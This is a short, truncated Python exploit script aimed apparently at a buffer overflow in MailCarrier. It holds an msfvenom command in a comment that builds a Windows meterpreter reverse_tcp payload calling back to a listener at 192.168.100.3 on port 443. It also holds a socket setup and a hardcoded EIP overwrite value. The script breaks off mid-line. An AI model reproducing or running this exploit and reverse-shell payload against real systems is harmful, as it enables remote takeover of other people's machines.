#!/usr/bin/env python3 import socket import sys import struct # msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -b "\x00" lhost=192.168.100.3 lport=443 -f py sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) eip_value = 0x0fa14923 # MailCarrier EIP Value packed_data = struct.pack('